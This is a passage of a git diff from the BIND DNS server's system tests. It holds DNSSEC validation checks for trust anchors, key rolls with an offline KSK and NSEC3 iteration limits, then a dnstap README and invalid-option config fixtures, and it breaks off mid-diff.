+# revoked.managed, unsupported.managed, disabled.trusted, revoked.trusted,
+# unsupported.trusted). Make sure that the bad trust anchors are ignored.
+# This is tested by looking for the corresponding lines in the logfile.
+echo_i "checking that keys with unsupported algorithms and disabled algorithms are ignored ($n)"
+ret=0
+grep -q "ignoring static-key for 'disabled\.trusted\.': algorithm is disabled" ns8/named.run || ret=1
+grep -q "ignoring static-key for 'unsupported\.trusted\.': algorithm is unsupported" ns8/named.run || ret=1
+grep -q "ignoring static-key for 'revoked\.trusted\.': bad key type" ns8/named.run || ret=1
+grep -q "ignoring initial-key for 'disabled\.managed\.': algorithm is disabled" ns8/named.run || ret=1
+grep -q "ignoring initial-key for 'unsupported\.managed\.': algorithm is unsupported" ns8/named.run || ret=1
+grep -q "ignoring initial-key for 'revoked\.managed\.': bad key type" ns8/named.run || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# The next two tests are fairly normal DNSSEC queries to signed zones with a
+# default algorithm. First, a query is made against the server that is
+# authoritative for the given zone (ns3).
Second, a query is made against a
+# resolver with trust anchors for the given zone (ns8). Both are expected to
+# return an authentic data positive response.
+echo_i "checking that a trusted key using a supported algorithm validates as secure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.secure.trusted A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.secure.trusted A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a managed key using a supported algorithm validates as secure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.secure.managed A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.secure.managed A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# The next two queries ensure that a zone signed with a DNSKEY with an unsupported
+# algorithm will yield insecure positive responses. These trust anchors in ns8 are
+# ignored and so this domain is treated as insecure. The AD bit should not be set
+# in the response.
+echo_i "checking that a trusted key using an unsupported algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.unsupported.trusted A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.unsupported.trusted A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a managed key using an unsupported algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.unsupported.managed A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.unsupported.managed A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# The next two queries ensure that a zone signed with a DNSKEY that the nameserver
+# has a disabled algorithm match for will yield insecure positive responses.
+# These trust anchors in ns8 are ignored and so this domain is treated as insecure.
+# The AD bit should not be set in the response.
+echo_i "checking that a trusted key using a disabled algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.disabled.trusted A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.disabled.trusted A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a managed key using a disabled algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.disabled.managed A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.disabled.managed A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# The next two queries ensure that a zone signed with a DNSKEY that the
+# nameserver has a disabled algorithm for, but for a different domain, will
+# yield secure positive responses. Since "enabled.trusted." and
+# "enabled.managed." do not match the "disable-algorithms" option, no
+# special rules apply and these zones should validate as secure, with the AD
+# bit set.
+echo_i "checking that a trusted key using an algorithm disabled for another domain validates as secure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.enabled.trusted A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.enabled.trusted A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a managed key using an algorithm disabled for another domain validates as secure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.enabled.managed A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.enabled.managed A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# A configured revoked trust anchor is ignored and thus the two queries below
+# should result in insecure responses, since no trust points for the
+# "revoked.trusted." and "revoked.managed." zones are created.
+echo_i "checking that a trusted key that is revoked validates as insecure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.revoked.trusted A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.revoked.trusted A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a managed key that is revoked validates as insecure ($n)"
+ret=0
+dig_with_opts @10.53.0.3 a.revoked.managed A > dig.out.ns3.test$n
+dig_with_opts @10.53.0.8 a.revoked.managed A > dig.out.ns8.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns8.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns8.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+###
+### Additional checks for when the KSK is offline.
+###
+
+# Save some useful information
+zone="updatecheck-kskonly.secure"
+KSK=$(cat ns2/${zone}.ksk.key)
+ZSK=$(cat ns2/${zone}.zsk.key)
+KSK_ID=$(cat ns2/${zone}.ksk.id)
+ZSK_ID=$(cat ns2/${zone}.zsk.id)
+SECTIONS="+answer +noauthority +noadditional"
+echo_i "testing zone $zone KSK=$KSK_ID ZSK=$ZSK_ID"
+
+# Print IDs of keys used for generating RRSIG records for RRsets of type $1
+# found in dig output file $2.
+get_keys_which_signed() {
+ qtype=$1
+ output=$2
+ # The key ID is the 11th column of the RRSIG record line.
+ awk -v qt="$qtype" '$4 == "RRSIG" && $5 == qt {print $11}' < "$output"
+}
+
+# Basic checks to make sure everything is fine before the KSK is made offline.
+for qtype in "DNSKEY" "CDNSKEY" "CDS"
+do
+ echo_i "checking $qtype RRset is signed with KSK only (update-check-ksk, dnssec-ksk-only) ($n)"
+ ret=0
+ dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n
+ lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l)
+ test "$lines" -eq 1 || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+done
+
+echo_i "checking SOA RRset is signed with ZSK only (update-check-ksk and dnssec-ksk-only) ($n)"
+ret=0
+dig_with_opts $SECTIONS @10.53.0.2 soa $zone > dig.out.test$n
+lines=$(get_keys_which_signed "SOA" dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+get_keys_which_signed "SOA" dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1
+get_keys_which_signed "SOA" dig.out.test$n | grep "^$ZSK_ID$" > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Roll the ZSK.
+zsk2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -K ns2 -n zone "$zone")
+keyfile_to_key_id "$zsk2" > ns2/$zone.zsk.id2
+ZSK_ID2=$(cat ns2/$zone.zsk.id2)
+
+echo_i "load new ZSK $ZSK_ID2 for $zone ($n)"
+ret=0
+dnssec_loadkeys_on 2 $zone || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Make new ZSK active.
+echo_i "make ZSK $ZSK_ID inactive and make new ZSK $ZSK_ID2 active for zone $zone ($n)"
+ret=0
+$SETTIME -I now -K ns2 $ZSK > /dev/null
+$SETTIME -A now -K ns2 $zsk2 > /dev/null
+dnssec_loadkeys_on 2 $zone || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Remove the KSK from disk.
+echo_i "remove the KSK $KSK_ID for zone $zone from disk"
+mv ns2/$KSK.key ns2/$KSK.key.bak
+mv ns2/$KSK.private ns2/$KSK.private.bak
+
+# Update the zone that requires a resign of the SOA RRset.
+echo_i "update the zone with $zone IN TXT nsupdate added me"
+(
+echo zone $zone
+echo server 10.53.0.2 "$PORT"
+echo update add $zone. 300 in txt "nsupdate added me"
+echo send
+) | $NSUPDATE
+
+# Redo the tests now that the zone is updated and the KSK is offline.
+for qtype in "DNSKEY" "CDNSKEY" "CDS"
+do
+ echo_i "checking $qtype RRset is signed with KSK only, KSK offline (update-check-ksk, dnssec-ksk-only) ($n)"
+ ret=0
+ dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n
+ lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l)
+ test "$lines" -eq 1 || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+done
+
+for qtype in "SOA" "TXT"
+do
+ echo_i "checking $qtype RRset is signed with ZSK only, KSK offline (update-check-ksk and dnssec-ksk-only) ($n)"
+ ret=0
+ dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n
+ lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l)
+ test "$lines" -eq 1 || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null || ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+done
+
+# Put back the KSK.
+echo_i "put back the KSK $KSK_ID for zone $zone from disk"
+mv ns2/$KSK.key.bak ns2/$KSK.key
+mv ns2/$KSK.private.bak ns2/$KSK.private
+
+# Roll the ZSK again.
+zsk3=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -K ns2 -n zone "$zone")
+keyfile_to_key_id "$zsk3" > ns2/$zone.zsk.id3
+ZSK_ID3=$(cat ns2/$zone.zsk.id3)
+
+# Schedule the new ZSK (ZSK3) to become active.
+echo_i "delete old ZSK $ZSK_ID schedule ZSK $ZSK_ID2 inactive and new ZSK $ZSK_ID3 active for zone $zone ($n)"
+$SETTIME -D now -K ns2 $ZSK > /dev/null
+$SETTIME -I +3600 -K ns2 $zsk2 > /dev/null
+$SETTIME -A +3600 -K ns2 $zsk3 > /dev/null
+dnssec_loadkeys_on 2 $zone || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Remove the KSK from disk.
+echo_i "remove the KSK $KSK_ID for zone $zone from disk"
+mv ns2/$KSK.key ns2/$KSK.key.bak
+mv ns2/$KSK.private ns2/$KSK.private.bak
+
+# Update the zone that requires a resign of the SOA RRset.
+echo_i "update the zone with $zone IN TXT nsupdate added me again"
+(
+echo zone $zone
+echo server 10.53.0.2 "$PORT"
+echo update add $zone. 300 in txt "nsupdate added me again"
+echo send
+) | $NSUPDATE
+
+# Redo the tests now that the ZSK roll has deleted the old key.
+for qtype in "DNSKEY" "CDNSKEY" "CDS"
+do
+ echo_i "checking $qtype RRset is signed with KSK only, old ZSK deleted (update-check-ksk, dnssec-ksk-only) ($n)"
+ ret=0
+ dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n
+ lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l)
+ test "$lines" -eq 1 || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null && ret=1
+ n=$((n+1))
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+done
+
+for qtype in "SOA" "TXT"
+do
+ echo_i "checking $qtype RRset is signed with ZSK only, old ZSK deleted (update-check-ksk and dnssec-ksk-only) ($n)"
+ ret=0
+ dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n
+ lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l)
+ test "$lines" -eq 1 || ret=1
+ get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" >
/dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +# Make the new ZSK (ZSK3) active. +echo_i "make new ZSK $ZSK_ID3 active for zone $zone ($n)" +$SETTIME -I +1 -K ns2 $zsk2 > /dev/null +$SETTIME -A +1 -K ns2 $zsk3 > /dev/null +dnssec_loadkeys_on 2 $zone || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Wait for newest ZSK to become active. +echo_i "wait until new ZSK $ZSK_ID3 active and ZSK $ZSK_ID2 inactive" +for i in 1 2 3 4 5 6 7 8 9 10; do + ret=0 + grep "DNSKEY $zone/$DEFAULT_ALGORITHM/$ZSK_ID3 (ZSK) is now active" ns2/named.run > /dev/null || ret=1 + grep "DNSKEY $zone/$DEFAULT_ALGORITHM/$ZSK_ID2 (ZSK) is now inactive" ns2/named.run > /dev/null || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update the zone that requires a resign of the SOA RRset. +echo_i "update the zone with $zone IN TXT nsupdate added me one more time" +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update add $zone. 300 in txt "nsupdate added me one more time" +echo send +) | $NSUPDATE +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Redo the tests one more time. 
+for qtype in "DNSKEY" "CDNSKEY" "CDS" +do + echo_i "checking $qtype RRset is signed with KSK only, new ZSK active (update-check-ksk, dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null && ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +for qtype in "SOA" "TXT" +do + echo_i "checking $qtype RRset is signed with ZSK only, new ZSK active (update-check-ksk and dnssec-ksk-only) ($n)" + ret=0 + dig_with_opts $SECTIONS @10.53.0.2 $qtype $zone > dig.out.test$n + lines=$(get_keys_which_signed $qtype dig.out.test$n | wc -l) + test "$lines" -eq 1 || ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$KSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID2$" > /dev/null && ret=1 + get_keys_which_signed $qtype dig.out.test$n | grep "^$ZSK_ID3$" > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done + +echo_i "checking secroots output with multiple views ($n)" +ret=0 +rndccmd 10.53.0.4 secroots 2>&1 | sed 's/^/ns4 /' | cat_i +cp ns4/named.secroots named.secroots.test$n +check_secroots_layout named.secroots.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking sig-validity-interval second field hours vs days ($n)" +ret=0 +# zone configured with 'sig-validity-interval 500 499;' +# 499 days in the future w/ a 20 minute runtime to now 
allowance +min=$(TZ=UTC $PERL -e '@lt=localtime(time() + 499*3600*24 - 20*60); printf "%.4d%0.2d%0.2d%0.2d%0.2d%0.2d\n",$lt[5]+1900,$lt[4]+1,$lt[3],$lt[2],$lt[1],$lt[0];') +dig_with_opts @10.53.0.2 hours-vs-days AXFR > dig.out.ns2.test$n +awk -v min=$min '$4 == "RRSIG" { if ($9 < min) { exit(1); } }' dig.out.ns2.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking validation succeeds during transition to signed ($n)" +ret=0 +dig_with_opts @10.53.0.4 inprogress A > dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep 'A.10\.53\.0\.10' dig.out.ns4.test$n >/dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking excessive NSEC3 iteration warnings in named.run ($n)" +ret=0 +grep "zone too-many-iterations/IN: excessive NSEC3PARAM iterations [0-9]* > 150" ns2/named.run >/dev/null 2>&1 || ret=1 +grep "zone too-many-iterations/IN: excessive NSEC3PARAM iterations [0-9]* > 150" ns3/named.run >/dev/null 2>&1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check that the validating resolver will fallback to insecure if the answer +# contains NSEC3 records with high iteration count. 
+echo_i "checking fallback to insecure when NSEC3 iterations is too high (nxdomain) ($n)" +ret=0 +dig_with_opts @10.53.0.2 does-not-exist.too-many-iterations > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 does-not-exist.too-many-iterations > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 6" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking fallback to insecure when NSEC3 iterations is too high (nodata) ($n)" +ret=0 +dig_with_opts @10.53.0.2 a.too-many-iterations txt > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 a.too-many-iterations txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking fallback to insecure when NSEC3 iterations is too high (wildcard) ($n)" +ret=0 +dig_with_opts @10.53.0.2 wild.a.too-many-iterations > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 wild.a.too-many-iterations > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep 'wild\.a\.too-many-iterations\..*A.10\.0\.0\.3' dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 2, AUTHORITY: 4" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking fallback to insecure when NSEC3 iterations is too high (wildcard nodata) ($n)" +ret=0 
+dig_with_opts @10.53.0.2 type100 wild.a.too-many-iterations > dig.out.ns2.test$n || ret=1 +dig_with_opts @10.53.0.4 type100 wild.a.too-many-iterations > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 8" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check that a query against a validating resolver succeeds when there is +# a negative cache entry with trust level "pending" for the DS. Prime +# with a +cd DS query to produce the negative cache entry, then send a +# query that uses that entry as part of the validation process. [GL #3279] +echo_i "check that pending negative DS cache entry validates ($n)" +ret=0 +dig_with_opts @10.53.0.4 +cd insecure2.example. ds > dig.out.prime.ns4.test$n || ret=1 +grep "flags: qr rd ra cd;" dig.out.prime.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.prime.ns4.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.prime.ns4.test$n > /dev/null || ret=1 +dig_with_opts @10.53.0.4 a.insecure2.example. a > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 1, " dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags: qr rd ra;" dig.out.ns4.test$n >/dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n >/dev/null || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dnstap/README b/bin/tests/system/dnstap/README new file mode 100644 index 0000000..856fe48 --- /dev/null +++ b/bin/tests/system/dnstap/README 
@@ -0,0 +1,27 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The "large-answer.fstrm" file was generated by configuring a named instance
+compiled with --enable-dnstap and --enable-fixed-rrset with the following
+directives:
+
+ minimal-responses yes;
+ rrset-order { order fixed; };
+ dnstap { auth response; };
+ dnstap-identity none;
+ dnstap-output file "large-answer.fstrm";
+
+The captured RRset from the "example." zone was created using:
+
+ $GENERATE 1-48 @ IN A 127.0.0.$
+
+A server instance set up this way was then queried non-recursively (RD=0) for
+"example/A".
diff --git a/bin/tests/system/dnstap/bad-fstrm-reopen-interval.conf b/bin/tests/system/dnstap/bad-fstrm-reopen-interval.conf
new file mode 100644
index 0000000..fd673d6
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-reopen-interval.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-reopen-interval 1x;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-max.conf
new file mode 100644
index 0000000..cdab66b
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-max.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-buffer-hint 65537;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-min.conf
new file mode 100644
index 0000000..c5444e9
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-min.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-buffer-hint 1023;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-max.conf
new file mode 100644
index 0000000..05ab1d9
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-max.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-flush-timeout 0;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-min.conf
new file mode 100644
index 0000000..398b1ab
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-min.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-flush-timeout 601;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-max.conf
new file mode 100644
index 0000000..d6c4120
